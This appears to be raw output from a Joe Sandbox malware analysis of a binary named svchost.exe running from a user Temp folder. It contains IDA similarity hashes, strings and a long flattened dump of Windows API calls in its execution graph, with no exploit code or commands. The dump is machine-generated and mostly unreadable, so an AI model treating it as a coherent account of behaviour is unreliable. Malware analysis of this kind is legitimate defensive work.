                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ErrorLast$abort
                                      • String ID:
                                      • API String ID: 1447195878-0
                                      • Opcode ID: e0db62ad708a49bacc26d6d5500a046c5e183a3b42353b83d554186b314d3a26
                                      • Instruction ID: a3f28f1402d4b6bda1b9ae1aebb68b0c37c16a97ce0c3781c6bf513ab0c40600
                                      • Opcode Fuzzy Hash: e0db62ad708a49bacc26d6d5500a046c5e183a3b42353b83d554186b314d3a26
                                      • Instruction Fuzzy Hash: E6012920A09642C2FE586F65A65617C71F25F48790F540638DD1E8E7D6EE2CE8098600
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                      • String ID:
                                      • API String ID: 2933794660-0
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID: DXGIDebug.dll
                                      • API String ID: 3668304517-540382549
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo
                                      • String ID: e+000$gfff
                                      • API String ID: 3215553584-3030954782
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                      • String ID: SIZE
                                      • API String ID: 449872665-3243624926
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ItemTextWindow
                                      • String ID: ASKNEXTVOL
                                      • API String ID: 2478532303-3402441367
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: FileModuleName_invalid_parameter_noinfo
                                      • String ID: C:\Users\user\AppData\Local\Temp\svchost.exe
                                      • API String ID: 3307058713-107691469
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ItemTextWindow
                                      • String ID: RENAMEDLG
                                      • API String ID: 2478532303-3299779563
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide_snwprintf
                                      • String ID: $%s$@%s
                                      • API String ID: 2650857296-834177443
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CreateDirectoryFreeLocal
                                      • String ID: D
                                      • API String ID: 2937684288-2746444292
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: FileHandleType
                                      • String ID: @
                                      • API String ID: 3000768030-2766056989
                                      APIs
                                      • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF669AD17B2), ref: 00007FF669AD3090
                                      • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF669AD17B2), ref: 00007FF669AD30D1
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ExceptionFileHeaderRaise
                                      • String ID: csm
                                      • API String ID: 2573137834-1018135373
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF669ABE2C7,?,?,?,00007FF669AB398E,?,?,?), ref: 00007FF669ABE3CB
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF669ABE2C7,?,?,?,00007FF669AB398E,?,?,?), ref: 00007FF669ABE3D6
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ErrorLastObjectSingleWait
                                      • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                      • API String ID: 1211598281-2248577382
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: FindHandleModuleResource
                                      • String ID: RTL
                                      • API String ID: 3537982541-834975271

                                      Execution Graph

                                      Execution Coverage:7.4%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0.7%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:76
7713->8658 7715 404408 8659 40de80 GetLastError TlsGetValue SetLastError 7715->8659 7717 404410 8660 402bfa 7717->8660 7721 404422 8690 405182 TlsGetValue 7721->8690 7723 40442b 8691 4098c0 7723->8691 7726 4051a0 3 API calls 7727 404439 7726->7727 8695 40de80 GetLastError TlsGetValue SetLastError 7727->8695 7729 404445 7730 40e020 4 API calls 7729->7730 7731 40444d 7730->7731 7732 40e020 4 API calls 7731->7732 7733 404459 7732->7733 7734 40dec0 3 API calls 7733->7734 7735 404465 7734->7735 8696 40de80 GetLastError TlsGetValue SetLastError 7735->8696 7737 40446b 8697 401e55 7737->8697 7740 40dec0 3 API calls 7741 404480 7740->7741 8743 403855 7741->8743 7745 404491 7746 40e020 4 API calls 7745->7746 7747 404499 7746->7747 7748 40dec0 3 API calls 7747->7748 7749 4044a3 PathQuoteSpacesW 7748->7749 8937 40de80 GetLastError TlsGetValue SetLastError 7749->8937 7751 4044b6 7752 40e020 4 API calls 7751->7752 7753 4044be 7752->7753 7754 40e020 4 API calls 7753->7754 7755 4044c9 7754->7755 7756 40e020 4 API calls 7755->7756 7757 4044d3 7756->7757 7758 40dec0 3 API calls 7757->7758 7759 4044dd PathQuoteSpacesW 7758->7759 7760 4044f1 7759->7760 7761 404509 7759->7761 8974 405492 CreateThread 7760->8974 8984 402ca9 7761->8984 7765 404512 8938 40de80 GetLastError TlsGetValue SetLastError 7765->8938 7767 404518 8939 40de80 GetLastError TlsGetValue SetLastError 7767->8939 10157 409ecf 7824->10157 7827 409ea4 7827->7389 7828 409e0b HeapAlloc 7830 409e93 HeapFree 7828->7830 7831 409e2e 7828->7831 7830->7827 10168 40d819 7831->10168 7835 40a367 HeapAlloc 7834->7835 7836 40a37c 7834->7836 7835->7836 7837 40d819 11 API calls 7836->7837 7838 40a3cf 7837->7838 7838->7393 7840 40dfc0 21 API calls 7839->7840 7841 40300e 7840->7841 10201 40de80 GetLastError TlsGetValue SetLastError 7841->10201 7843 403014 10202 40de80 GetLastError TlsGetValue SetLastError 7843->10202 7845 40301c 10203 40de80 GetLastError TlsGetValue SetLastError 7845->10203 7847 403024 10204 40de80 GetLastError TlsGetValue 
SetLastError 7847->10204 7849 40302c 7850 40d100 8 API calls 7849->7850 7851 40303e 7850->7851 10205 405182 TlsGetValue 7851->10205 7853 403043 7854 405eb0 6 API calls 7853->7854 7855 40304b 7854->7855 7856 40dec0 3 API calls 7855->7856 7857 403055 7856->7857 10206 40de80 GetLastError TlsGetValue SetLastError 7857->10206 7859 40305b 10207 40de80 GetLastError TlsGetValue SetLastError 7859->10207 7861 403063 10208 40de80 GetLastError TlsGetValue SetLastError 7861->10208 7863 40306b 10209 40de80 GetLastError TlsGetValue SetLastError 7863->10209 7865 403073 7866 40d100 8 API calls 7865->7866 7867 403083 7866->7867 10210 405182 TlsGetValue 7867->10210 7869 403088 7870 405eb0 6 API calls 7869->7870 7871 403090 7870->7871 7872 40dec0 3 API calls 7871->7872 7873 40309a 7872->7873 7874 402e9d 35 API calls 7873->7874 7875 4030a2 7874->7875 10211 40de80 GetLastError TlsGetValue SetLastError 7875->10211 7877 4030ac 7878 4021a4 122 API calls 7877->7878 7879 4030b7 7878->7879 7880 4051a0 3 API calls 7879->7880 7881 4030bc 7880->7881 10212 40de80 GetLastError TlsGetValue SetLastError 7881->10212 7883 4030c2 10213 40de80 GetLastError TlsGetValue SetLastError 7883->10213 7885 4030ca 7886 409355 33 API calls 7885->7886 7887 4030dd 7886->7887 7888 40dec0 3 API calls 7887->7888 7889 4030e7 7888->7889 7890 40323e 7889->7890 10214 40de80 GetLastError TlsGetValue SetLastError 7889->10214 7890->7890 7892 4030fe 10215 40de80 GetLastError TlsGetValue SetLastError 7892->10215 7894 403106 10216 40de80 GetLastError TlsGetValue SetLastError 7894->10216 7896 40310e 10217 40de80 GetLastError TlsGetValue SetLastError 7896->10217 7898 403116 7899 40d100 8 API calls 7898->7899 7900 403128 7899->7900 10218 405182 TlsGetValue 7900->10218 7902 40312d 7903 405eb0 6 API calls 7902->7903 7904 403135 7903->7904 7905 40dec0 3 API calls 7904->7905 7906 40313f 7905->7906 10219 40de80 GetLastError TlsGetValue SetLastError 7906->10219 7908 403145 10220 40de80 GetLastError TlsGetValue SetLastError 7908->10220 
7910 40314d 10221 40de80 GetLastError TlsGetValue SetLastError 7910->10221 7912 403155 10222 40de80 GetLastError TlsGetValue SetLastError 7912->10222 7914 40315d 7915 40d100 8 API calls 7914->7915 7916 40316f 7915->7916 10223 405182 TlsGetValue 7916->10223 7918 403174 7919 405eb0 6 API calls 7918->7919 7920 40317c 7919->7920 7921 40dec0 3 API calls 7920->7921 7922 403186 7921->7922 10224 40de80 GetLastError TlsGetValue SetLastError 7922->10224 7924 40318c 7925 403cd7 84 API calls 7924->7925 7926 40319c 7925->7926 7927 40dec0 3 API calls 7926->7927 7928 4031a8 7927->7928 10225 40de80 GetLastError TlsGetValue SetLastError 7928->10225 7930 4031ae 7931 403cd7 84 API calls 7930->7931 7932 4031be 7931->7932 7933 40dec0 3 API calls 7932->7933 7934 4031c8 PathAddBackslashW 7933->7934 10226 40de80 GetLastError TlsGetValue SetLastError 7934->10226 7936 4031d7 10227 40de80 GetLastError TlsGetValue SetLastError 7936->10227 7938 4031e7 7939 40e020 4 API calls 7938->7939 7940 4031ef 7939->7940 7941 40e020 4 API calls 7940->7941 7942 4031fb 7941->7942 10228 405182 TlsGetValue 7942->10228 7944 403200 7945 40240c 34 API calls 7944->7945 7946 403208 7945->7946 7947 4051a0 3 API calls 7946->7947 7948 40320d 7947->7948 10229 40de80 GetLastError TlsGetValue SetLastError 7948->10229 7950 403217 7951 40e020 4 API calls 7950->7951 7952 40321f 7951->7952 7953 40dec0 3 API calls 7952->7953 7954 40322b PathRemoveBackslashW 7953->7954 7955 402ca9 141 API calls 7954->7955 7955->7890 7970->7427 7971->7430 7973 40d362 7972->7973 7974 40d3a0 TlsGetValue HeapReAlloc TlsSetValue 7973->7974 7975 40d378 TlsAlloc HeapAlloc TlsSetValue 7973->7975 7976 40d3e0 7974->7976 7977 40d3dc 7974->7977 7975->7974 7979 40db72 HeapAlloc 7976->7979 7977->7976 7978 409674 7977->7978 7981 40d52c HeapAlloc HeapAlloc InitializeCriticalSection 7978->7981 7980 40d3ec 7979->7980 7980->7978 7981->7436 7983 40e141 wcslen 7982->7983 7984 40e1ad 7982->7984 7986 40e176 HeapReAlloc 7983->7986 7987 40e158 HeapAlloc 7983->7987 
7985 40e1b5 HeapFree 7984->7985 7988 40e198 7984->7988 7985->7988 7986->7988 7987->7988 7988->7441 7990 40a4c6 7989->7990 7994 40a4a7 7989->7994 7991 40a3eb 7990->7991 7992 40d74b 3 API calls 7990->7992 7996 40d946 7991->7996 7992->7990 7994->7991 8009 411d8a 7994->8009 8014 40d74b 7994->8014 7997 40d953 EnterCriticalSection 7996->7997 7998 40d9b8 7996->7998 7999 40d9ae LeaveCriticalSection 7997->7999 8000 40d96f 7997->8000 8024 40d6dd 7998->8024 8003 40a3f3 7999->8003 8002 40d946 4 API calls 8000->8002 8007 40d979 HeapFree 8002->8007 8003->7449 8003->7452 8005 40d9c4 DeleteCriticalSection 8006 40d9ce HeapFree 8005->8006 8006->8003 8007->7999 8010 411e85 8009->8010 8011 411da2 8009->8011 8010->7994 8011->8010 8013 411d8a HeapFree 8011->8013 8021 40df50 8011->8021 8013->8011 8015 40d758 EnterCriticalSection 8014->8015 8019 40d762 8014->8019 8015->8019 8016 40d7cb 8017 40d814 8016->8017 8018 40d80a LeaveCriticalSection 8016->8018 8017->7994 8018->8017 8019->8016 8020 40d7b5 HeapFree 8019->8020 8020->8016 8022 40df5b HeapFree 8021->8022 8023 40df6e 8021->8023 8022->8023 8023->8011 8025 40d6f5 8024->8025 8026 40d6eb EnterCriticalSection 8024->8026 8027 40d712 8025->8027 8028 40d6fc HeapFree 8025->8028 8026->8025 8029 40d718 HeapFree 8027->8029 8030 40d72e 8027->8030 8028->8027 8028->8028 8029->8029 8029->8030 8031 40d745 8030->8031 8032 40d73b LeaveCriticalSection 8030->8032 8031->8005 8031->8006 8032->8031 8034 40dbdb 8033->8034 8038 40dd26 8033->8038 8034->7456 8034->7458 8035 40dd51 HeapFree 8035->8034 8036 40dd4f 8036->8035 8037 411d8a HeapFree 8037->8038 8038->8035 8038->8036 8038->8037 8040 40dfea TlsGetValue 8039->8040 8041 40dfcc 8039->8041 8043 402f4d 8040->8043 8044 40dffb 8040->8044 8042 40de30 5 API calls 8041->8042 8045 40dfd1 TlsGetValue 8042->8045 8051 4051a0 8043->8051 8083 40e6a0 HeapAlloc HeapAlloc TlsSetValue 8044->8083 8074 412082 8045->8074 8048 40e000 TlsGetValue 8049 412082 13 API calls 8048->8049 8049->8043 8084 40e780 GetLastError TlsGetValue 
SetLastError 8051->8084 8053 4051ab 8053->7470 8054->7472 8055->7474 8056->7476 8057->7478 8060 40d12d 8058->8060 8085 40d220 8060->8085 8062 405182 TlsGetValue 8062->7482 8064 405ebd 8063->8064 8095 40e1e0 TlsGetValue 8064->8095 8067 40e260 3 API calls 8068 405ed1 8067->8068 8069 405edd 8068->8069 8097 40e370 TlsGetValue 8068->8097 8070 405f0d 8069->8070 8072 405f00 CharUpperW 8069->8072 8070->7484 8072->7484 8073->7486 8075 412092 TlsAlloc InitializeCriticalSection 8074->8075 8076 4120ae TlsGetValue 8074->8076 8075->8076 8077 4120c4 HeapAlloc 8076->8077 8078 41214b HeapAlloc 8076->8078 8079 40dfe8 8077->8079 8080 4120de EnterCriticalSection 8077->8080 8078->8079 8079->8043 8081 4120f0 7 API calls 8080->8081 8082 4120ee 8080->8082 8081->8078 8082->8081 8083->8048 8084->8053 8086 40d22c 8085->8086 8089 40e260 TlsGetValue 8086->8089 8090 40e27b 8089->8090 8091 40e2a1 HeapReAlloc 8090->8091 8092 40e2d4 8090->8092 8093 402fd9 8091->8093 8092->8093 8094 40e2f0 HeapReAlloc 8092->8094 8093->8062 8094->8093 8096 405ec5 8095->8096 8096->8067 8097->8069 8098->7495 8099->7497 8100->7499 8102 40e260 3 API calls 8101->8102 8103 4096aa GetModuleFileNameW wcscmp 8102->8103 8104 4096e5 8103->8104 8105 4096cd memmove 8103->8105 8171 40e3f0 TlsGetValue 8104->8171 8105->8104 8107 401bc5 8108 405182 TlsGetValue 8107->8108 8108->7503 8109->7512 8110->7514 8111->7516 8112->7519 8113->7521 8114->7524 8116 405e1d 8115->8116 8117 40e1e0 TlsGetValue 8116->8117 8118 405e40 8117->8118 8119 40e260 3 API calls 8118->8119 8120 405e4c 8119->8120 8121 401ce9 8120->8121 8172 40e370 TlsGetValue 8120->8172 8123 405182 TlsGetValue 8121->8123 8123->7529 8173 40d080 8124->8173 8127 405182 TlsGetValue 8127->7533 8128->7539 8130 40e042 8129->8130 8131 40e033 wcslen 8129->8131 8132 40e260 3 API calls 8130->8132 8131->8130 8133 40e04d 8132->8133 8133->7541 8134->7545 8135->7547 8136->7549 8137->7551 8138->7555 8139->7561 8140->7563 8142 405f2e 8141->8142 8143 40e1e0 TlsGetValue 8142->8143 8144 405f4a 
8143->8144 8145 40e260 3 API calls 8144->8145 8146 405f56 8145->8146 8147 405f62 8146->8147 8188 40e370 TlsGetValue 8146->8188 8147->7565 8189 40d2e8 TlsGetValue 8149->8189 8154 40de80 GetLastError TlsGetValue SetLastError 8154->7572 8155->7576 8157 40d2e8 16 API calls 8156->8157 8158 409885 8157->8158 8159 40973a 17 API calls 8158->8159 8160 409898 8159->8160 8161 40e260 3 API calls 8160->8161 8162 4098a6 8161->8162 8198 40e3f0 TlsGetValue 8162->8198 8164 401dc9 8165 40e080 TlsGetValue 8164->8165 8165->7584 8199 40e740 TlsGetValue 8166->8199 8168 40516a 8168->7590 8169->7592 8170->7594 8171->8107 8172->8121 8176 40d092 8173->8176 8174 40d0dd 8175 40d220 3 API calls 8174->8175 8177 401cf6 8175->8177 8176->8174 8181 4121a0 8176->8181 8177->8127 8179 40d0b8 8187 412190 free 8179->8187 8182 412214 malloc 8181->8182 8183 4121ac WideCharToMultiByte 8181->8183 8182->8179 8183->8182 8185 4121e0 malloc 8183->8185 8185->8182 8186 4121f2 WideCharToMultiByte 8185->8186 8186->8179 8187->8174 8188->8147 8190 409869 8189->8190 8191 40d2fb HeapAlloc TlsSetValue 8189->8191 8194 40973a 8190->8194 8192 40d327 8191->8192 8193 412082 13 API calls 8192->8193 8193->8190 8195 40d2e8 16 API calls 8194->8195 8196 40974b GetCommandLineW 8195->8196 8197 401dab 8196->8197 8197->7570 8197->8154 8198->8164 8199->8168 8201 40e260 3 API calls 8200->8201 8202 405dcb 8201->8202 8202->7639 8203->7630 8204->7653 8206 40327b 8205->8206 8206->8206 8207 40dfc0 21 API calls 8206->8207 8208 40328d 8207->8208 8209 4051a0 3 API calls 8208->8209 8210 403296 8209->8210 9064 405060 8210->9064 8213 405060 2 API calls 8214 4032af 8213->8214 9067 402bc1 8214->9067 8217 4032b8 9077 40559a GetVersionExW 8217->9077 8218 4032cb 8221 4032d5 8218->8221 8222 40343b 8218->8222 9072 40de80 GetLastError TlsGetValue SetLastError 8221->9072 9110 40de80 GetLastError TlsGetValue SetLastError 8222->9110 8225 403441 9111 40de80 GetLastError TlsGetValue SetLastError 8225->9111 8226 4032db 9073 40de80 GetLastError TlsGetValue 
SetLastError 8226->9073 8229 403449 8231 4062c0 3 API calls 8229->8231 8230 4032e3 9074 4062c0 8230->9074 8233 403455 8231->8233 8235 40dec0 3 API calls 8233->8235 8237 40345f GetSystemDirectoryW PathAddBackslashW 8235->8237 8236 40dec0 3 API calls 8238 4032f9 GetWindowsDirectoryW PathAddBackslashW 8236->8238 8240 403439 8237->8240 9083 40de80 GetLastError TlsGetValue SetLastError 8238->9083 9112 40de80 GetLastError TlsGetValue SetLastError 8240->9112 8241 40331a 8243 40e020 4 API calls 8241->8243 8245 403322 8243->8245 8244 403480 8246 40e020 4 API calls 8244->8246 8247 40e020 4 API calls 8245->8247 8248 403488 8246->8248 8250 40332d 8247->8250 9113 405170 TlsGetValue 8248->9113 8252 40dec0 3 API calls 8250->8252 8251 40348f 8254 40df50 HeapFree 8251->8254 8253 403337 PathAddBackslashW 8252->8253 9084 40de80 GetLastError TlsGetValue SetLastError 8253->9084 8256 4034a7 8254->8256 8258 40df50 HeapFree 8256->8258 8257 40334a 8259 40e020 4 API calls 8257->8259 8260 4034af 8258->8260 8261 403352 8259->8261 8262 40df50 HeapFree 8260->8262 8263 40e020 4 API calls 8261->8263 8264 4034b8 8262->8264 8265 40335c 8263->8265 8266 40df50 HeapFree 8264->8266 8267 40dec0 3 API calls 8265->8267 8268 4034c1 8266->8268 8269 403366 8267->8269 8271 40df50 HeapFree 8268->8271 9085 40de80 GetLastError TlsGetValue SetLastError 8269->9085 8273 4034ca 8271->8273 8272 403370 8274 40e020 4 API calls 8272->8274 8273->7658 8275 403378 8274->8275 8276 40e020 4 API calls 8275->8276 8277 403382 8276->8277 8278 40e020 4 API calls 8277->8278 8279 40338c 8278->8279 8280 40dec0 3 API calls 8279->8280 8281 403396 8280->8281 9086 40adc0 8281->9086 8283 4033a4 8284 4033ba 8283->8284 9096 40a9d0 8283->9096 8286 40adc0 11 API calls 8284->8286 8287 4033d2 8286->8287 8288 4033e8 8287->8288 8289 40a9d0 11 API calls 8287->8289 8288->8240 9108 40de80 GetLastError TlsGetValue SetLastError 8288->9108 8289->8288 8291 403404 9109 40de80 GetLastError TlsGetValue SetLastError 8291->9109 8293 40340c 8294 4062c0 3 API 
calls 8293->8294 8295 403418 8294->8295 8296 40dec0 3 API calls 8295->8296 8297 403422 GetSystemDirectoryW PathAddBackslashW 8296->8297 8297->8240 8298->7664 8299->7666 8300->7668 8301->7670 8302->7674 8303->7680 8304->7682 8305->7684 8306->7686 8307->7690 8309 40dfc0 21 API calls 8308->8309 8310 402eaa 8309->8310 8311 405060 2 API calls 8310->8311 8312 402eb6 FindResourceW 8311->8312 8313 402ed5 8312->8313 8320 402ef1 8312->8320 9141 4026b8 8313->9141 8317 402f00 9155 40e7c0 8317->9155 9152 409ba0 8320->9152 8322 40df50 HeapFree 8323 402f3b 8322->8323 8324 40de80 GetLastError TlsGetValue SetLastError 8323->8324 8324->7698 8326 40dfc0 21 API calls 8325->8326 8327 4021b0 8326->8327 8328 4051a0 3 API calls 8327->8328 8329 4021b9 8328->8329 8330 4023ae 8329->8330 9181 40de80 GetLastError TlsGetValue SetLastError 8329->9181 9287 40de80 GetLastError TlsGetValue SetLastError 8330->9287 8333 4021d8 9182 40de80 GetLastError TlsGetValue SetLastError 8333->9182 8334 4023c4 8336 40e020 4 API calls 8334->8336 8338 4023cc 8336->8338 8337 4021e0 9183 40de80 GetLastError TlsGetValue SetLastError 8337->9183 9288 405170 TlsGetValue 8338->9288 8341 4023d3 8344 40df50 HeapFree 8341->8344 8342 4021e8 9184 40de80 GetLastError TlsGetValue SetLastError 8342->9184 8346 4023eb 8344->8346 8345 4021f0 9185 409c10 8345->9185 8348 40df50 HeapFree 8346->8348 8351 4023f4 8348->8351 8349 402204 9194 405182 TlsGetValue 8349->9194 8353 40df50 HeapFree 8351->8353 8352 402209 9195 406060 8352->9195 8355 4023fc 8353->8355 8357 40df50 HeapFree 8355->8357 8359 402405 8357->8359 8358 40dec0 3 API calls 8360 40221b 8358->8360 8359->7701 9198 40de80 GetLastError TlsGetValue SetLastError 8360->9198 8362 402221 9199 40de80 GetLastError TlsGetValue SetLastError 8362->9199 8364 402229 9200 40de80 GetLastError TlsGetValue SetLastError 8364->9200 8366 402231 9201 40de80 GetLastError TlsGetValue SetLastError 8366->9201 8368 402239 8369 409c10 5 API calls 8368->8369 8370 402250 8369->8370 9202 405182 TlsGetValue 
8370->9202 8372 402255 8373 406060 5 API calls 8372->8373 8374 40225d 8373->8374 8375 40dec0 3 API calls 8374->8375 8376 402267 8375->8376 9203 40de80 GetLastError TlsGetValue SetLastError 8376->9203 8378 40226d 9204 40de80 GetLastError TlsGetValue SetLastError 8378->9204 8380 402275 9205 40de80 GetLastError TlsGetValue SetLastError 8380->9205 8382 402288 9206 40de80 GetLastError TlsGetValue SetLastError 8382->9206 8384 402290 9207 4057f0 8384->9207 8386 4022a6 9223 40e080 TlsGetValue 8386->9223 8388 4022ab 9224 40de80 GetLastError TlsGetValue SetLastError 8388->9224 8390 4022b1 9225 40de80 GetLastError TlsGetValue SetLastError 8390->9225 8392 4022b9 8393 4057f0 9 API calls 8392->8393 8394 4022cf 8393->8394 9226 405182 TlsGetValue 8394->9226 8396 4022d4 9227 405182 TlsGetValue 8396->9227 8398 4022dc 9228 408f69 8398->9228 8400 4022e5 8401 40dec0 3 API calls 8400->8401 8402 4022ef 8401->8402 8403 4023b0 8402->8403 8404 402300 8402->8404 8406 401fa9 36 API calls 8403->8406 9270 40de80 GetLastError TlsGetValue SetLastError 8404->9270 8406->8330 8407 402306 9271 40de80 GetLastError TlsGetValue SetLastError 8407->9271 8409 40230e 9272 40de80 GetLastError TlsGetValue SetLastError 8409->9272 8411 40231b 9273 40de80 GetLastError TlsGetValue SetLastError 8411->9273 8413 402323 8414 406060 5 API calls 8413->8414 8415 40232e 8414->8415 9274 405182 TlsGetValue 8415->9274 8417 402333 8418 40d100 8 API calls 8417->8418 8419 40233b 8418->8419 8420 40dec0 3 API calls 8419->8420 8421 402345 8420->8421 8421->8330 9275 40de80 GetLastError TlsGetValue SetLastError 8421->9275 8423 40235b 9276 40de80 GetLastError TlsGetValue SetLastError 8423->9276 8425 402368 9277 40de80 GetLastError TlsGetValue SetLastError 8425->9277 8427 402370 8428 4057f0 9 API calls 8427->8428 8429 402386 8428->8429 9278 40e080 TlsGetValue 8429->9278 8431 40238b 9279 405182 TlsGetValue 8431->9279 8433 402396 9280 408e27 8433->9280 8436 4051a0 3 API calls 8437 4023a4 8436->8437 8438 401fa9 36 API calls 8437->8438 
8438->8330 8440 40dfc0 21 API calls 8439->8440 8444 401969 8440->8444 8441 4019ea 8443 409ba0 RtlAllocateHeap 8441->8443 8442 40de80 GetLastError TlsGetValue SetLastError 8442->8444 8445 4019f4 8443->8445 8444->8441 8444->8442 8448 405dc0 3 API calls 8444->8448 8457 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8444->8457 8460 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8444->8460 9339 40de80 GetLastError TlsGetValue SetLastError 8445->9339 8447 4019fe 9340 40de80 GetLastError TlsGetValue SetLastError 8447->9340 8448->8444 8450 401a06 9341 40a756 8450->9341 8453 40dec0 3 API calls 8454 401a17 GetTempFileNameW 8453->8454 9350 40de80 GetLastError TlsGetValue SetLastError 8454->9350 8456 401a35 9351 40de80 GetLastError TlsGetValue SetLastError 8456->9351 8457->8444 8459 401a3d 8461 409bc0 4 API calls 8459->8461 8460->8444 8462 401a48 8461->8462 8463 40dec0 3 API calls 8462->8463 8464 401a54 8463->8464 9352 40a7e7 8464->9352 8470 401a8a 9361 40de80 GetLastError TlsGetValue SetLastError 8470->9361 8472 401a92 8473 409bc0 4 API calls 8472->8473 8474 401a9d 8473->8474 8475 40dec0 3 API calls 8474->8475 8476 401aa9 8475->8476 8477 40a7e7 2 API calls 8476->8477 8478 401ab4 8477->8478 8479 40a6c5 3 API calls 8478->8479 8480 401abf GetTempFileNameW PathAddBackslashW 8479->8480 9362 40de80 GetLastError TlsGetValue SetLastError 8480->9362 8482 401aea 9363 40de80 GetLastError TlsGetValue SetLastError 8482->9363 8484 401af2 8485 409bc0 4 API calls 8484->8485 8486 401afd 8485->8486 8487 40dec0 3 API calls 8486->8487 8488 401b09 8487->8488 8489 40a7e7 2 API calls 8488->8489 8490 401b14 PathRenameExtensionW GetTempFileNameW 8489->8490 9364 40de80 GetLastError TlsGetValue SetLastError 8490->9364 8492 401b43 9365 40de80 GetLastError TlsGetValue SetLastError 8492->9365 8494 401b4b 8495 409bc0 4 API calls 8494->8495 8496 401b56 8495->8496 8497 40dec0 3 API calls 8496->8497 8498 401b62 8497->8498 9366 409b80 HeapFree 8498->9366 8500 401b6b 8501 40df50 HeapFree 8500->8501 
8502 401b78 8501->8502 8503 40df50 HeapFree 8502->8503 8504 401b81 8503->8504 8505 40df50 HeapFree 8504->8505 8506 401b8a 8505->8506 8507 40460e 8506->8507 8508 40dfc0 21 API calls 8507->8508 8522 40461b 8508->8522 8509 40469c 9373 40de80 GetLastError TlsGetValue SetLastError 8509->9373 8510 40de80 GetLastError TlsGetValue SetLastError 8510->8522 8512 4046a2 8514 40358d 98 API calls 8512->8514 8513 405dc0 3 API calls 8513->8522 8515 4046b8 8514->8515 8517 40dec0 3 API calls 8515->8517 8516 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8516->8522 8518 4046c2 8517->8518 9374 40a95a 8518->9374 8521 40df50 HeapFree 8523 4046d6 8521->8523 8522->8509 8522->8510 8522->8513 8522->8516 8524 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8522->8524 8525 40df50 HeapFree 8523->8525 8524->8522 8526 4046df 8525->8526 8527 40df50 HeapFree 8526->8527 8528 4043c2 8527->8528 8529 40de80 GetLastError TlsGetValue SetLastError 8528->8529 8529->7708 8531 40dfc0 21 API calls 8530->8531 8532 403597 8531->8532 8533 4051a0 3 API calls 8532->8533 8534 4035a0 8533->8534 8535 405060 2 API calls 8534->8535 8536 4035ac 8535->8536 8537 4035b7 8536->8537 8538 4035db 8536->8538 9379 40de80 GetLastError TlsGetValue SetLastError 8537->9379 8539 4035e5 8538->8539 8540 403608 8538->8540 9381 40de80 GetLastError TlsGetValue SetLastError 8539->9381 8543 403612 8540->8543 8544 40363b 8540->8544 9382 40de80 GetLastError TlsGetValue SetLastError 8543->9382 8547 403645 8544->8547 8548 40366e 8544->8548 8545 4035bd 9380 40de80 GetLastError TlsGetValue SetLastError 8545->9380 8546 4035f1 8555 40e020 4 API calls 8546->8555 9400 40de80 GetLastError TlsGetValue SetLastError 8547->9400 8553 4036a1 8548->8553 8554 403678 8548->8554 8551 403618 9383 40de80 GetLastError TlsGetValue SetLastError 8551->9383 8552 4035c5 8558 40a7f5 5 API calls 8552->8558 8562 4036d4 